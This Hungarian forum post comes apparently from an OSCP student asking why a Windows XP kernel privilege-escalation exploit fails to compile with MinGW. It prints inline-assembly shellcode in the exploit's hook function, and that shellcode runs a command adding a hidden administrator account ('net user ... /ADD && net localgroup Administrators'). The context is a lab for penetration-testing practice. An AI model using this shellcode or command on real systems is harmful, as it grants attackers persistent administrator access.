mingw, c+inline assembly

Sziasztok!

Disznóságnak tűnhet, amit kérdezni akarok, ezért elmondom, mihez kell. Az oscp nevű tanfolyamot csinálom éppen, ami betöréstesztelők számára indul. Ehhez tartozik egy vpn-en elérhető belső labor, ahol by design sebezhető szerverek tömkelegén lehet gyakorolni a tanultakat.
Ezen szerverek közül az egyiknél sikerült már shell-t szereznem, de csak egy nagyon korlátozott jogú felhasználóval. A szerveren Windows XP fut. Az adminisztrátori jogok megszerzéséhez tehát jogosultságszint-emelést kéne végrehajtanom. Több local exploittal is kísérleteztem már, de ezek rendre nem működtek.

Most találtam egyet, aminél a PoC úgy tűnik, sikeres. Az exploit itt található: http://www.exploit-db.com/exploits/3755/
Ebben a kódban van egy hook nevű függvény, ami úgy kerül meghívásra, hogy a sebezhetőség sikeres kihasználása után a benne lévő kód kernel módban fut le. Több shellcode-ot is megpróbáltam ide beilleszteni, de ezek rendre elbuktak. Úgy gondoltam, mielőtt teljesen elvetném ennek az exploitnak az alkalmazását és más utat keresnék a privilégiumszint emeléséhez, megpróbálok tisztán assembly-t beilleszteni, és nem már lefordított kódokkal bűvészkedni.

Az assemblyhez nem értek, ezért google. Találtam is egyet, ami pont azt csinálja, ami nekem kell, itt található az oldal közepe felé: http://projectshellcode.com/?q=node/20 (adduser.asm)
Ezt kicsit alakítva és beillesztve az exploitba most így néz ki a hook függvényem (az exploit többi részéhez nem nyúltam):

hook (HANDLE pal, COLORREF couleur)
{
// INT3
// Executed code with kernel privilege


// http://projectshellcode.com/?q=node/20
asm (".intel_syntax noprefix");
__asm__ ("cli");
__asm__ ("jmp short GetCommand ;\
CommandReturn: ;\
pop ebx ; \
xor eax,eax ;\
push eax ;\
push ebx ;\
mov ebx,0x7c8615b5 ;\
call ebx ;\
xor eax,eax ;\
push eax ;\
mov ebx, 0x7c81ca82 ;\
call ebx ;\
GetCommand: ;\
call CommandReturn ;\
db ""cmd.exe /c net user PSUser PSPasswd /ADD && net localgroup Administrators /ADD PSUser"" ;\
db 0x00");

__asm__ ("sti");
asm (".att_syntax noprefix");

flag_test = 1;

return (TRUE);

}

A fordítás linux alatt történik az alábbi parancssorral és hibaüzenettel:


$ pwd
/root/.wine/drive_c/MinGW/bin
$ wine gcc -o privesc.exe /root/gdilocalpriv.c -lwsock32 -lgdi32
C:\users\root\Temp/ccJbcaaa.s: Assembler messages:
C:\users\root\Temp/ccJbcaaa.s:11: Error: no such instruction: `db cmd.exe/c net user PSUser PSPasswd/ADD&&net localgroup Administrators/ADD PSUser'
C:\users\root\Temp/ccJbcaaa.s:11: Error: no such instruction: `db 0x00'


Két napig próbáltam trükközni és google-zni, de rendre ezt kapom, a db-t nem akarja ismerni. A kérdés tehát, hogy mit lehet ezzel kezdeni? Mint írtam, az assemblyhez nem értek, így lehet, hogy nagyon butaságot kérdeztem.

Most, hogy ezt így leírtam, eszembe jutott, hogy akár C-ből is létrehozhattam volna a felhasználót assembly nélkül, ezt ki is fogom próbálni, ha oda jutok, viszont a fentiekre a megoldás akkor is érdekelne.

Ha pedig van itt véletlenül valaki, aki mostanában csinálja az oscp-t és van kedve közösen tanulni, írjon egy pm-t. (Azt meg se merem kérdezni, hogy van-e olyan önként vállalkozó, akit időnként zaklathatnék ilyesmi kérdésekkel; nem vagyok se lassú felfogású, se pióca, csak vacak dolog napokat szenvedni részletkérdéseken, mint amilyen valószínűleg a fenti is, ahelyett hogy a laboridőt hasznosabb dolgokra fordítanám.)

Köszönöm a válaszokat!